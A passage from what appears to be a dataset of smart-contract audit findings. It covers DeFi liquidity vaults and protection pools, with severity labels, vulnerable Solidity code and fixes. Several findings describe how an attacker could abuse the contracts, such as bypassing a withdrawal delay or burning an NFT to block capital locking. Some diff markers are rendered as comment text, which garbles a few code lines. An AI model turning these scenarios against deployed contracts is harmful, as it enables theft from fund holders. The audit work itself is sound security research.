_withdraw(lpAmount_, minTokenAmounts_);\\n\\n // Reduce deposit values\\n uint256 userDeposit = pairTokenDeposits[msg.sender];\\n pairTokenDeposits[msg.sender] // Remove the line below\\n= pairTokenReceived > userDeposit\\n ? 
userDeposit\\n : pairTokenReceived;\\n// Remove the line below\\n ohmMinted // Remove the line below\\n= ohmReceived > ohmMinted ? ohmMinted : ohmReceived;\\n ohmRemoved += ohmReceived > ohmMinted ? ohmReceived // Remove the line below\\n ohmMinted : 0;\\n```\\nчIt will make the calculation involving ohmMinted incorrect.ч```\\n ohmMinted -= ohmReceived > ohmMinted ? ohmMinted : ohmReceived;\\n ohmRemoved += ohmReceived > ohmMinted ? ohmReceived - ohmMinted : 0;\\n```\\n -SingleSidedLiquidityVault._accumulateInternalRewards will revert with underflow error if rewardToken.lastRewardTime is bigger than current timeчmediumчSingleSidedLiquidityVault._accumulateInternalRewards will revert with underflow error if rewardToken.lastRewardTime is bigger than current time\\n```\\n function _accumulateInternalRewards() internal view returns (uint256[] memory) {\\n uint256 numInternalRewardTokens = internalRewardTokens.length;\\n uint256[] memory accumulatedInternalRewards = new uint256[](numInternalRewardTokens);\\n\\n\\n for (uint256 i; i < numInternalRewardTokens; ) {\\n InternalRewardToken memory rewardToken = internalRewardTokens[i];\\n\\n\\n uint256 totalRewards;\\n if (totalLP > 0) {\\n uint256 timeDiff = block.timestamp - rewardToken.lastRewardTime;\\n totalRewards = (timeDiff * rewardToken.rewardsPerSecond);\\n }\\n\\n\\n accumulatedInternalRewards[i] = totalRewards;\\n\\n\\n unchecked {\\n ++i;\\n }\\n }\\n\\n\\n return accumulatedInternalRewards;\\n }\\n```\\n\\nThe line is needed to see is this `uint256 timeDiff = block.timestamp - rewardToken.lastRewardTime`. 
If `rewardToken.lastRewardTime > block.timestamp`, then the function will revert and DoS the functions that use it.\\n```\\n function addInternalRewardToken(\\n address token_,\\n uint256 rewardsPerSecond_,\\n uint256 startTimestamp_\\n ) external onlyRole(\"liquidityvault_admin\") {\\n InternalRewardToken memory newInternalRewardToken = InternalRewardToken({\\n token: token_,\\n decimalsAdjustment: 10**ERC20(token_).decimals(),\\n rewardsPerSecond: rewardsPerSecond_,\\n lastRewardTime: block.timestamp > startTimestamp_ ? block.timestamp : startTimestamp_,\\n accumulatedRewardsPerShare: 0\\n });\\n\\n\\n internalRewardTokens.push(newInternalRewardToken);\\n }\\n```\\n\\nIf `startTimestamp_` is in the future, then it will be set and cause that problem: lastRewardTime: block.timestamp > `startTimestamp_` ? block.timestamp : `startTimestamp_`.\\nNow, until the `startTimestamp_` time, `_accumulateInternalRewards` will not work, so the vault will be stopped. And of course, the admin can remove that token and everything will be fine. 
That's why I think this is medium.чSkip the token if its `lastRewardTime` is in the future.чSingleSidedLiquidityVault will be blockedч```\\n function _accumulateInternalRewards() internal view returns (uint256[] memory) {\\n uint256 numInternalRewardTokens = internalRewardTokens.length;\\n uint256[] memory accumulatedInternalRewards = new uint256[](numInternalRewardTokens);\\n\\n\\n for (uint256 i; i < numInternalRewardTokens; ) {\\n InternalRewardToken memory rewardToken = internalRewardTokens[i];\\n\\n\\n uint256 totalRewards;\\n if (totalLP > 0) {\\n uint256 timeDiff = block.timestamp - rewardToken.lastRewardTime;\\n totalRewards = (timeDiff * rewardToken.rewardsPerSecond);\\n }\\n\\n\\n accumulatedInternalRewards[i] = totalRewards;\\n\\n\\n unchecked {\\n ++i;\\n }\\n }\\n\\n\\n return accumulatedInternalRewards;\\n }\\n```\\n -claimFees may cause some external rewards to be locked in the contractчmediumчclaimFees will update rewardToken.lastBalance so that if there are unaccrued reward tokens in the contract, users will not be able to claim them.\\n_accumulateExternalRewards takes the difference between the contract's reward token balance and lastBalance as the reward. 
and the accumulated reward tokens are updated by _updateExternalRewardState.\\n```\\n function _accumulateExternalRewards() internal override returns (uint256[] memory) {\\n uint256 numExternalRewards = externalRewardTokens.length;\\n\\n auraPool.rewardsPool.getReward(address(this), true);\\n\\n uint256[] memory rewards = new uint256[](numExternalRewards);\\n for (uint256 i; i < numExternalRewards; ) {\\n ExternalRewardToken storage rewardToken = externalRewardTokens[i];\\n uint256 newBalance = ERC20(rewardToken.token).balanceOf(address(this));\\n\\n // This shouldn't happen but adding a sanity check in case\\n if (newBalance < rewardToken.lastBalance) {\\n emit LiquidityVault_ExternalAccumulationError(rewardToken.token);\\n continue;\\n }\\n\\n rewards[i] = newBalance - rewardToken.lastBalance;\\n rewardToken.lastBalance = newBalance;\\n\\n unchecked {\\n ++i;\\n }\\n }\\n return rewards;\\n }\\n// rest of code\\n function _updateExternalRewardState(uint256 id_, uint256 amountAccumulated_) internal {\\n // This correctly uses 1e18 because the LP tokens of all major DEXs have 18 decimals\\n if (totalLP != 0)\\n externalRewardTokens[id_].accumulatedRewardsPerShare +=\\n (amountAccumulated_ * 1e18) /\\n totalLP;\\n }\\n```\\n\\nauraPool.rewardsPool.getReward can be called by anyone to send the reward tokens to the contract\\n```\\n function getReward(address _account, bool _claimExtras) public updateReward(_account) returns(bool){\\n uint256 reward = earned(_account);\\n if (reward > 0) {\\n rewards[_account] = 0;\\n rewardToken.safeTransfer(_account, reward);\\n IDeposit(operator).rewardClaimed(pid, _account, reward);\\n emit RewardPaid(_account, reward);\\n }\\n\\n //also get rewards from linked rewards\\n if(_claimExtras){\\n for(uint i=0; i < extraRewards.length; i++){\\n IRewards(extraRewards[i]).getReward(_account);\\n }\\n }\\n return true;\\n }\\n```\\n\\nHowever, in claimFees, the rewardToken.lastBalance will be updated to the current contract balance after 
the admin has claimed the fees.\\n```\\n function claimFees() external onlyRole(\"liquidityvault_admin\") {\\n uint256 numInternalRewardTokens = internalRewardTokens.length;\\n uint256 numExternalRewardTokens = externalRewardTokens.length;\\n\\n for (uint256 i; i < numInternalRewardTokens; ) {\\n address rewardToken = internalRewardTokens[i].token;\\n uint256 feeToSend = accumulatedFees[rewardToken];\\n\\n accumulatedFees[rewardToken] = 0;\\n\\n ERC20(rewardToken).safeTransfer(msg.sender, feeToSend);\\n\\n unchecked {\\n ++i;\\n }\\n }\\n\\n for (uint256 i; i < numExternalRewardTokens; ) {\\n ExternalRewardToken storage rewardToken = externalRewardTokens[i];\\n uint256 feeToSend = accumulatedFees[rewardToken.token];\\n\\n accumulatedFees[rewardToken.token] = 0;\\n\\n ERC20(rewardToken.token).safeTransfer(msg.sender, feeToSend);\\n rewardToken.lastBalance = ERC20(rewardToken.token).balanceOf(address(this));\\n\\n unchecked {\\n ++i;\\n }\\n }\\n }\\n```\\n\\nConsider the following scenario.\\nStart with rewardToken.lastBalance = 200.\\nAfter some time, the rewardToken in aura is increased by 100.\\nSomeone calls getReward to claim the reward tokens to the contract, and the 100 reward tokens increased have not yet been accumulated via _accumulateExternalRewards and _updateExternalRewardState.\\nThe admin calls claimFees to update rewardToken.lastBalance to 290(10 as fees).\\nUsers call claimRewards and receives 0 reward tokens. 
90 reward tokens will be locked in the contractчUse _accumulateExternalRewards and _updateExternalRewardState in claimFees to accrue rewards.\\n```\\n function claimFees() external onlyRole(\"liquidityvault_admin\") {\\n uint256 numInternalRewardTokens = internalRewardTokens.length;\\n uint256 numExternalRewardTokens = externalRewardTokens.length;\\n\\n for (uint256 i; i < numInternalRewardTokens; ) {\\n address rewardToken = internalRewardTokens[i].token;\\n uint256 feeToSend = accumulatedFees[rewardToken];\\n\\n accumulatedFees[rewardToken] = 0;\\n\\n ERC20(rewardToken).safeTransfer(msg.sender, feeToSend);\\n\\n unchecked {\\n // Add the line below\\n// Add the line below\\ni;\\n }\\n }\\n// Add the line below\\n uint256[] memory accumulatedExternalRewards = _accumulateExternalRewards();\\n for (uint256 i; i < numExternalRewardTokens; ) {\\n// Add the line below\\n _updateExternalRewardState(i, accumulatedExternalRewards[i]);\\n ExternalRewardToken storage rewardToken = externalRewardTokens[i];\\n uint256 feeToSend = accumulatedFees[rewardToken.token];\\n\\n accumulatedFees[rewardToken.token] = 0;\\n\\n ERC20(rewardToken.token).safeTransfer(msg.sender, feeToSend);\\n rewardToken.lastBalance = ERC20(rewardToken.token).balanceOf(address(this));\\n\\n unchecked {\\n // Add the line below\\n// Add the line below\\ni;\\n }\\n }\\n }\\n```\\nчIt will cause some external rewards to be locked in the contractч```\\n function _accumulateExternalRewards() internal override returns (uint256[] memory) {\\n uint256 numExternalRewards = externalRewardTokens.length;\\n\\n auraPool.rewardsPool.getReward(address(this), true);\\n\\n uint256[] memory rewards = new uint256[](numExternalRewards);\\n for (uint256 i; i < numExternalRewards; ) {\\n ExternalRewardToken storage rewardToken = externalRewardTokens[i];\\n uint256 newBalance = ERC20(rewardToken.token).balanceOf(address(this));\\n\\n // This shouldn't happen but adding a sanity check in case\\n if (newBalance < 
rewardToken.lastBalance) {\\n emit LiquidityVault_ExternalAccumulationError(rewardToken.token);\\n continue;\\n }\\n\\n rewards[i] = newBalance - rewardToken.lastBalance;\\n rewardToken.lastBalance = newBalance;\\n\\n unchecked {\\n ++i;\\n }\\n }\\n return rewards;\\n }\\n// rest of code\\n function _updateExternalRewardState(uint256 id_, uint256 amountAccumulated_) internal {\\n // This correctly uses 1e18 because the LP tokens of all major DEXs have 18 decimals\\n if (totalLP != 0)\\n externalRewardTokens[id_].accumulatedRewardsPerShare +=\\n (amountAccumulated_ * 1e18) /\\n totalLP;\\n }\\n```\\n -Protection sellers can bypass withdrawal delay mechanism and avoid losing funds when loans are defaulted by creating withdrawal request in each cycleчhighчTo prevent protection sellers from withdrawing fund immediately when protected lending pools are defaults, there is withdrawal delay mechanism, but it's possible to bypass it by creating withdraw request in each cycle by doing so user can withdraw in each cycle's open state. 
there is no penalty for users when they do this or there is no check to avoid this.\\nThis is `_requestWithdrawal()` code:\\n```\\n function _requestWithdrawal(uint256 _sTokenAmount) internal {\\n uint256 _sTokenBalance = balanceOf(msg.sender);\\n if (_sTokenAmount > _sTokenBalance) {\\n revert InsufficientSTokenBalance(msg.sender, _sTokenBalance);\\n }\\n\\n /// Get current cycle index for this pool\\n uint256 _currentCycleIndex = poolCycleManager.getCurrentCycleIndex(\\n address(this)\\n );\\n\\n /// Actual withdrawal is allowed in open period of cycle after next cycle\\n /// For example: if request is made in at some time in cycle 1,\\n /// then withdrawal is allowed in open period of cycle 3\\n uint256 _withdrawalCycleIndex = _currentCycleIndex + 2;\\n\\n WithdrawalCycleDetail storage withdrawalCycle = withdrawalCycleDetails[\\n _withdrawalCycleIndex\\n ];\\n\\n /// Cache existing requested amount for the cycle for the sender\\n uint256 _oldRequestAmount = withdrawalCycle.withdrawalRequests[msg.sender];\\n withdrawalCycle.withdrawalRequests[msg.sender] = _sTokenAmount;\\n\\n unchecked {\\n /// Update total requested withdrawal amount for the cycle considering existing requested amount\\n if (_oldRequestAmount > _sTokenAmount) {\\n withdrawalCycle.totalSTokenRequested -= (_oldRequestAmount -\\n _sTokenAmount);\\n } else {\\n withdrawalCycle.totalSTokenRequested += (_sTokenAmount -\\n _oldRequestAmount);\\n }\\n }\\n\\n emit WithdrawalRequested(msg.sender, _sTokenAmount, _withdrawalCycleIndex);\\n }\\n```\\n\\nAs you can see it doesn't keep track of user current withdrawal requests and user can request withdrawal for all of his balance in each cycle and by doing so user can set `withdrawalCycleDetails[Each Cycle][User]` to user's sToken balance. 
and whenever user wants to withdraw he only need to wait until the end of the current cycle while he should have waited until next cycle end.чTo avoid this code should keep track of user balance that is not in withdraw delay and user balance that are requested for withdraw. and to prevent users from requesting withdrawing and not doing it protocol should have some penalties for withdrawals, for example the waiting withdraw balance shouldn't get reward in waiting duration.чprotection sellers can request withdraw in each cycle for their full sToken balance and code would allow them to withdraw in each cycle end time because code doesn't track how much of the balance of users is requested for withdrawals in the past.ч```\\n function _requestWithdrawal(uint256 _sTokenAmount) internal {\\n uint256 _sTokenBalance = balanceOf(msg.sender);\\n if (_sTokenAmount > _sTokenBalance) {\\n revert InsufficientSTokenBalance(msg.sender, _sTokenBalance);\\n }\\n\\n /// Get current cycle index for this pool\\n uint256 _currentCycleIndex = poolCycleManager.getCurrentCycleIndex(\\n address(this)\\n );\\n\\n /// Actual withdrawal is allowed in open period of cycle after next cycle\\n /// For example: if request is made in at some time in cycle 1,\\n /// then withdrawal is allowed in open period of cycle 3\\n uint256 _withdrawalCycleIndex = _currentCycleIndex + 2;\\n\\n WithdrawalCycleDetail storage withdrawalCycle = withdrawalCycleDetails[\\n _withdrawalCycleIndex\\n ];\\n\\n /// Cache existing requested amount for the cycle for the sender\\n uint256 _oldRequestAmount = withdrawalCycle.withdrawalRequests[msg.sender];\\n withdrawalCycle.withdrawalRequests[msg.sender] = _sTokenAmount;\\n\\n unchecked {\\n /// Update total requested withdrawal amount for the cycle considering existing requested amount\\n if (_oldRequestAmount > _sTokenAmount) {\\n withdrawalCycle.totalSTokenRequested -= (_oldRequestAmount -\\n _sTokenAmount);\\n } else {\\n withdrawalCycle.totalSTokenRequested += 
(_sTokenAmount -\\n _oldRequestAmount);\\n }\\n }\\n\\n emit WithdrawalRequested(msg.sender, _sTokenAmount, _withdrawalCycleIndex);\\n }\\n```\\n -Lending pool state transition will be broken when pool is expired in late stateчhighчLending pool state transition will be broken when pool is expired in late state\\n```\\n function _getLendingPoolStatus(address _lendingPoolAddress)\\n internal\\n view\\n returns (LendingPoolStatus)\\n {\\n if (!_isReferenceLendingPoolAdded(_lendingPoolAddress)) {\\n return LendingPoolStatus.NotSupported;\\n }\\n\\n\\n ILendingProtocolAdapter _adapter = _getLendingProtocolAdapter(\\n _lendingPoolAddress\\n );\\n\\n\\n if (_adapter.isLendingPoolExpired(_lendingPoolAddress)) {\\n return LendingPoolStatus.Expired;\\n }\\n\\n\\n if (\\n _adapter.isLendingPoolLateWithinGracePeriod(\\n _lendingPoolAddress,\\n Constants.LATE_PAYMENT_GRACE_PERIOD_IN_DAYS\\n )\\n ) {\\n return LendingPoolStatus.LateWithinGracePeriod;\\n }\\n\\n\\n if (_adapter.isLendingPoolLate(_lendingPoolAddress)) {\\n return LendingPoolStatus.Late;\\n }\\n\\n\\n return LendingPoolStatus.Active;\\n }\\n```\\n\\nAs you can see, pool is expired if time of credit line has ended or loan is fully paid.\\nState transition for lending pool is done inside `DefaultStateManager._assessState` function. This function is responsible to lock capital, when state is late and unlock it when it's changed from late to active again.\\nBecause the first state that is checked is `expired` there can be few problems.\\nFirst problem. Suppose that lending pool is in late state. So capital is locked. There are 2 options now: payment was done, so pool becomes active and capital unlocked, payment was not done then pool has defaulted. But in case when state is late, and lending pool expired or loan is fully repaid(so it's also becomes expired), then capital will not be unlocked as there is no such transition Late -> Expired. The state will be changed to Expired and no more actions will be done. 
Also in this case it's not possible to detect if lending pool expired because of time or because no payment was done.\\nSecond problem. Lending pool is in active state. Last payment should be done some time before `_creditLine.termEndTime()`. Payment was not done, which means that state should be changed to Late and capital should be locked, but state was checked when loan has ended, so it became Expired and again there is no such transition that can detect that capital should be locked in this case. The state will be changed to Expired and no more actions will be done.чThese are tricky cases, think about transition for lending pool in such cases.чDepending on situation, capital can be locked forever or protection buyers will not be compensated.ч```\\n function _getLendingPoolStatus(address _lendingPoolAddress)\\n internal\\n view\\n returns (LendingPoolStatus)\\n {\\n if (!_isReferenceLendingPoolAdded(_lendingPoolAddress)) {\\n return LendingPoolStatus.NotSupported;\\n }\\n\\n\\n ILendingProtocolAdapter _adapter = _getLendingProtocolAdapter(\\n _lendingPoolAddress\\n );\\n\\n\\n if (_adapter.isLendingPoolExpired(_lendingPoolAddress)) {\\n return LendingPoolStatus.Expired;\\n }\\n\\n\\n if (\\n _adapter.isLendingPoolLateWithinGracePeriod(\\n _lendingPoolAddress,\\n Constants.LATE_PAYMENT_GRACE_PERIOD_IN_DAYS\\n )\\n ) {\\n return LendingPoolStatus.LateWithinGracePeriod;\\n }\\n\\n\\n if (_adapter.isLendingPoolLate(_lendingPoolAddress)) {\\n return LendingPoolStatus.Late;\\n }\\n\\n\\n return LendingPoolStatus.Active;\\n }\\n```\\n -Existing buyer who has been regularly renewing protection will be denied renewal even when she is well within the renewal grace periodчhighчExisting buyers have an opportunity to renew their protection within grace period. 
If lending state update happens from `Active` to `LateWithinGracePeriod` just 1 second after a buyer's protection expires, protocol denies buyer an opportunity even when she is well within the grace period.\\nSince defaults are not sudden and an `Active` loan first transitions into `LateWithinGracePeriod`, it is unfair to deny an existing buyer an opportunity to renew (its alright if a new protection buyer is DOSed). This is especially so because a late loan can become `active` again in future (or move to `default`, but both possibilities exist at this stage).\\nAll previous protection payments are a total loss for a buyer when she is denied a legitimate renewal request at the first sign of danger.\\n`renewProtection` first calls `verifyBuyerCanRenewProtection` that checks if the user requesting renewal holds same NFT id on same lending pool address & that the current request is within grace period defined by protocol.\\nOnce successfully verified, `renewProtection` calls `_verifyAndCreateProtection` to renew protection. 
This is the same function that gets called when a new protection is created.\\nNotice that this function calls `_verifyLendingPoolIsActive` as part of its verification before creating new protection - this check denies protection on loans that are in `LateWithinGracePeriod` or `Late` phase (see snippet below).\\n```\\nfunction _verifyLendingPoolIsActive(\\n IDefaultStateManager defaultStateManager,\\n address _protectionPoolAddress,\\n address _lendingPoolAddress\\n ) internal view {\\n LendingPoolStatus poolStatus = defaultStateManager.getLendingPoolStatus(\\n _protectionPoolAddress,\\n _lendingPoolAddress\\n );\\n\\n // rest of code\\n if (\\n poolStatus == LendingPoolStatus.LateWithinGracePeriod ||\\n poolStatus == LendingPoolStatus.Late\\n ) {\\n revert IProtectionPool.LendingPoolHasLatePayment(_lendingPoolAddress);\\n }\\n // rest of code\\n}\\n```\\nчWhen a user is calling `renewProtection`, a different implementation of `verifyLendingPoolIsActive` is needed that allows a user to renew even when lending pool status is `LateWithinGracePeriod` or `Late`.\\nRecommend using `verifyLendingPoolIsActiveForRenewal` function in renewal flow as shown below\\n```\\n function verifyLendingPoolIsActiveForRenewal(\\n IDefaultStateManager defaultStateManager,\\n address _protectionPoolAddress,\\n address _lendingPoolAddress\\n ) internal view {\\n LendingPoolStatus poolStatus = defaultStateManager.getLendingPoolStatus(\\n _protectionPoolAddress,\\n _lendingPoolAddress\\n );\\n\\n if (poolStatus == LendingPoolStatus.NotSupported) {\\n revert IProtectionPool.LendingPoolNotSupported(_lendingPoolAddress);\\n }\\n //------ audit - this section needs to be commented-----//\\n //if (\\n // poolStatus == LendingPoolStatus.LateWithinGracePeriod ||\\n // poolStatus == LendingPoolStatus.Late\\n //) {\\n // revert IProtectionPool.LendingPoolHasLatePayment(_lendingPoolAddress);\\n //}\\n // ---------------------------------------------------------//\\n\\n if (poolStatus == 
LendingPoolStatus.Expired) {\\n revert IProtectionPool.LendingPoolExpired(_lendingPoolAddress);\\n }\\n\\n if (poolStatus == LendingPoolStatus.Defaulted) {\\n revert IProtectionPool.LendingPoolDefaulted(_lendingPoolAddress);\\n }\\n }\\n```\\nчUser who has been regularly renewing protection and paying premium to protect against a future loss event will be denied that very protection when she most needs it.\\nIf existing user is denied renewal, she can never get back in (unless the lending pool becomes active again). All her previous payments were a total loss for her.ч```\\nfunction _verifyLendingPoolIsActive(\\n IDefaultStateManager defaultStateManager,\\n address _protectionPoolAddress,\\n address _lendingPoolAddress\\n ) internal view {\\n LendingPoolStatus poolStatus = defaultStateManager.getLendingPoolStatus(\\n _protectionPoolAddress,\\n _lendingPoolAddress\\n );\\n\\n // rest of code\\n if (\\n poolStatus == LendingPoolStatus.LateWithinGracePeriod ||\\n poolStatus == LendingPoolStatus.Late\\n ) {\\n revert IProtectionPool.LendingPoolHasLatePayment(_lendingPoolAddress);\\n }\\n // rest of code\\n}\\n```\\n -Malicious seller forced break lockCapital()чhighчMalicious burn nft causes failure to lockCapital() ,seller steady earn PremiumAmount, buyer will be lost compensation\\nWhen the status of the lendingPool changes from Active to Late, the protocol will call ProtectionPool.lockCapital() to lock amount lockCapital() will loop through the active protections to calculate the `lockedAmount`. 
The code is as follows:\\n```\\n function lockCapital(address _lendingPoolAddress)\\n external\\n payable\\n override\\n onlyDefaultStateManager\\n whenNotPaused\\n returns (uint256 _lockedAmount, uint256 _snapshotId)\\n {\\n// rest of code.\\n uint256 _length = activeProtectionIndexes.length();\\n for (uint256 i; i < _length; ) {\\n// rest of code\\n uint256 _remainingPrincipal = poolInfo\\n .referenceLendingPools\\n .calculateRemainingPrincipal( //<----------- calculate Remaining Principal\\n _lendingPoolAddress,\\n protectionInfo.buyer,\\n protectionInfo.purchaseParams.nftLpTokenId\\n );\\n```\\n\\nThe important thing inside is to calculate the _remainingPrincipal by `referenceLendingPools.calculateRemainingPrincipal()`\\n```\\n function calculateRemainingPrincipal(\\n address _lendingPoolAddress,\\n address _lender,\\n uint256 _nftLpTokenId\\n ) public view override returns (uint256 _principalRemaining) {\\n// rest of code\\n\\n if (_poolTokens.ownerOf(_nftLpTokenId) == _lender) { //<------------call ownerOf()\\n IPoolTokens.TokenInfo memory _tokenInfo = _poolTokens.getTokenInfo(\\n _nftLpTokenId\\n );\\n\\n// rest of code.\\n if (\\n _tokenInfo.pool == _lendingPoolAddress &&\\n _isJuniorTrancheId(_tokenInfo.tranche)\\n ) {\\n _principalRemaining =\\n _tokenInfo.principalAmount -\\n _tokenInfo.principalRedeemed;\\n }\\n }\\n }\\n```\\n\\nGoldfinchAdapter.calculateRemainingPrincipal() The current implementation will first determine if the ownerOf the NFTID is _lender\\nThere is a potential problem here, if the NFTID has been burned, the ownerOf() will be directly revert, which will lead to calculateRemainingPrincipal() revert,and lockCapital() revert and can't change status from active to late\\nLet's see whether Goldfinch's implementation supports burn(NFTID), and whether ownerOf(NFTID) will revert\\nPoolTokens has burn() method , if principalRedeemed==principalAmount you can burn it\\n```\\ncontract PoolTokens is IPoolTokens, 
ERC721PresetMinterPauserAutoIdUpgradeSafe, HasAdmin, IERC2981 {\\n// rest of code..\\n function burn(uint256 tokenId) external virtual override whenNotPaused {\\n TokenInfo memory token = _getTokenInfo(tokenId);\\n bool canBurn = _isApprovedOrOwner(_msgSender(), tokenId);\\n bool fromTokenPool = _validPool(_msgSender()) && token.pool == _msgSender();\\n address owner = ownerOf(tokenId);\\n require(canBurn || fromTokenPool, \"ERC721Burnable: caller cannot burn this token\");\\n require(token.principalRedeemed == token.principalAmount, \"Can only burn fully redeemed tokens\");\\n _destroyAndBurn(tokenId);\\n emit TokenBurned(owner, token.pool, tokenId);\\n }\\n```\\n\\n2.ownerOf() if nftid don't exists will revert with message \"ERC721: owner query for nonexistent token\"\\n```\\ncontract ERC721UpgradeSafe is\\n Initializable,\\n ContextUpgradeSafe,\\n ERC165UpgradeSafe,\\n IERC721,\\n IERC721Metadata,\\n IERC721Enumerable\\n{\\n// rest of code\\n function ownerOf(uint256 tokenId) public view override returns (address) {\\n return _tokenOwners.get(tokenId, \"ERC721: owner query for nonexistent token\");\\n }\\n```\\n\\nIf it can't changes to late, Won't lock the fund, seller steady earn PremiumAmount\\nSo there are two risks\\nnormal buyer gives NFTID to burn(), he does not know that it will affect all protection of the lendingPool\\nMalicious seller can buy a protection first, then burn it, so as to force all protection of the lendingPool to expire and get the PremiumAmount maliciously. 
buyer unable to obtain compensation\\nSuggested try catch for _poolTokens.ownerOf() If revert, it is assumed that the lender is not the ownerчtry catch for _poolTokens.ownerOf() If revert, it is assumed that the lender is not the ownerчbuyer will be lost compensationч```\\n function lockCapital(address _lendingPoolAddress)\\n external\\n payable\\n override\\n onlyDefaultStateManager\\n whenNotPaused\\n returns (uint256 _lockedAmount, uint256 _snapshotId)\\n {\\n// rest of code.\\n uint256 _length = activeProtectionIndexes.length();\\n for (uint256 i; i < _length; ) {\\n// rest of code\\n uint256 _remainingPrincipal = poolInfo\\n .referenceLendingPools\\n .calculateRemainingPrincipal( //<----------- calculate Remaining Principal\\n _lendingPoolAddress,\\n protectionInfo.buyer,\\n protectionInfo.purchaseParams.nftLpTokenId\\n );\\n```\\n -function lockCapital() doesn't filter the expired protections first and code may lock more funds than required and expired defaulted protections may fundedчmediumчwhen a lending loan defaults, then function `lockCapital()` get called in the ProtectionPool to lock required funds for the protections bought for that lending pool, but code doesn't filter the expired protections first and they may be expired protection in the active protection array that are not excluded and this would cause code to lock more fund and pay fund for expired defaulted protections and protection sellers would lose more funds.\\nThis `lockCapital()` code:\\n```\\n function lockCapital(address _lendingPoolAddress)\\n external\\n payable\\n override\\n onlyDefaultStateManager\\n whenNotPaused\\n returns (uint256 _lockedAmount, uint256 _snapshotId)\\n {\\n /// step 1: Capture protection pool's current investors by creating a snapshot of the token balance by using ERC20Snapshot in SToken\\n _snapshotId = _snapshot();\\n\\n /// step 2: calculate total capital to be locked\\n LendingPoolDetail storage lendingPoolDetail = lendingPoolDetails[\\n 
_lendingPoolAddress\\n ];\\n\\n /// Get indexes of active protection for a lending pool from the storage\\n EnumerableSetUpgradeable.UintSet\\n storage activeProtectionIndexes = lendingPoolDetail\\n .activeProtectionIndexes;\\n\\n /// Iterate all active protections and calculate total locked amount for this lending pool\\n /// 1. calculate remaining principal amount for each loan protection in the lending pool.\\n /// 2. for each loan protection, lockedAmt = min(protectionAmt, remainingPrincipal)\\n /// 3. total locked amount = sum of lockedAmt for all loan protections\\n uint256 _length = activeProtectionIndexes.length();\\n for (uint256 i; i < _length; ) {\\n /// Get protection info from the storage\\n uint256 _protectionIndex = activeProtectionIndexes.at(i);\\n ProtectionInfo storage protectionInfo = protectionInfos[_protectionIndex];\\n\\n /// Calculate remaining principal amount for a loan protection in the lending pool\\n uint256 _remainingPrincipal = poolInfo\\n .referenceLendingPools\\n .calculateRemainingPrincipal(\\n _lendingPoolAddress,\\n protectionInfo.buyer,\\n protectionInfo.purchaseParams.nftLpTokenId\\n );\\n\\n /// Locked amount is minimum of protection amount and remaining principal\\n uint256 _protectionAmount = protectionInfo\\n .purchaseParams\\n .protectionAmount;\\n uint256 _lockedAmountPerProtection = _protectionAmount <\\n _remainingPrincipal\\n ? 
_protectionAmount\\n : _remainingPrincipal;\\n\\n _lockedAmount += _lockedAmountPerProtection;\\n\\n unchecked {\\n ++i;\\n }\\n }\\n\\n unchecked {\\n /// step 3: Update total locked & available capital in storage\\n if (totalSTokenUnderlying < _lockedAmount) {\\n /// If totalSTokenUnderlying < _lockedAmount, then lock all available capital\\n _lockedAmount = totalSTokenUnderlying;\\n totalSTokenUnderlying = 0;\\n } else {\\n /// Reduce the total sToken underlying amount by the locked amount\\n totalSTokenUnderlying -= _lockedAmount;\\n }\\n }\\n }\\n```\\n\\nAs you can see code loops through active protection array for that lending pool and calculates required locked amount but it doesn't call `_accruePremiumAndExpireProtections()` to make sure active protections doesn't include any expired protections. if function `_accruePremiumAndExpireProtections()` doesn't get called for a while, then there would be possible that some of the protections are expired and they are still in the active protection array. This would cause code to calculated more locked amount and also pay fund for those expired defaulted protections too from protection sellers. 
(also when calculating the required token payment for the protection, the code doesn't check the expiration in the other functions that get called by `lockCapital()`; the expiry check doesn't exist in the inner functions either)чcall `_accruePremiumAndExpireProtections()` for the defaulted pool to filter out the expired protections.чsee summaryч```\\n function lockCapital(address _lendingPoolAddress)\\n external\\n payable\\n override\\n onlyDefaultStateManager\\n whenNotPaused\\n returns (uint256 _lockedAmount, uint256 _snapshotId)\\n {\\n /// step 1: Capture protection pool's current investors by creating a snapshot of the token balance by using ERC20Snapshot in SToken\\n _snapshotId = _snapshot();\\n\\n /// step 2: calculate total capital to be locked\\n LendingPoolDetail storage lendingPoolDetail = lendingPoolDetails[\\n _lendingPoolAddress\\n ];\\n\\n /// Get indexes of active protection for a lending pool from the storage\\n EnumerableSetUpgradeable.UintSet\\n storage activeProtectionIndexes = lendingPoolDetail\\n .activeProtectionIndexes;\\n\\n /// Iterate all active protections and calculate total locked amount for this lending pool\\n /// 1. calculate remaining principal amount for each loan protection in the lending pool.\\n /// 2. for each loan protection, lockedAmt = min(protectionAmt, remainingPrincipal)\\n /// 3. 
total locked amount = sum of lockedAmt for all loan protections\\n uint256 _length = activeProtectionIndexes.length();\\n for (uint256 i; i < _length; ) {\\n /// Get protection info from the storage\\n uint256 _protectionIndex = activeProtectionIndexes.at(i);\\n ProtectionInfo storage protectionInfo = protectionInfos[_protectionIndex];\\n\\n /// Calculate remaining principal amount for a loan protection in the lending pool\\n uint256 _remainingPrincipal = poolInfo\\n .referenceLendingPools\\n .calculateRemainingPrincipal(\\n _lendingPoolAddress,\\n protectionInfo.buyer,\\n protectionInfo.purchaseParams.nftLpTokenId\\n );\\n\\n /// Locked amount is minimum of protection amount and remaining principal\\n uint256 _protectionAmount = protectionInfo\\n .purchaseParams\\n .protectionAmount;\\n uint256 _lockedAmountPerProtection = _protectionAmount <\\n _remainingPrincipal\\n ? _protectionAmount\\n : _remainingPrincipal;\\n\\n _lockedAmount += _lockedAmountPerProtection;\\n\\n unchecked {\\n ++i;\\n }\\n }\\n\\n unchecked {\\n /// step 3: Update total locked & available capital in storage\\n if (totalSTokenUnderlying < _lockedAmount) {\\n /// If totalSTokenUnderlying < _lockedAmount, then lock all available capital\\n _lockedAmount = totalSTokenUnderlying;\\n totalSTokenUnderlying = 0;\\n } else {\\n /// Reduce the total sToken underlying amount by the locked amount\\n totalSTokenUnderlying -= _lockedAmount;\\n }\\n }\\n }\\n```\\n -If unlocked capital in pool falls below minRequiredCapital, then protection can be bought for minimum premiumчmediumчIf the unlocked capital in a pool falls below the minRequiredCapital, then protection can be bought for minimum premium\\nIn PremiumCalculator.calculatePremium, we see that if the risk factor \"cannot be calculated,\" it uses the minimum premium.\\n```\\n if (\\n RiskFactorCalculator.canCalculateRiskFactor(\\n _totalCapital,\\n _leverageRatio,\\n _poolParameters.leverageRatioFloor,\\n _poolParameters.leverageRatioCeiling,\\n 
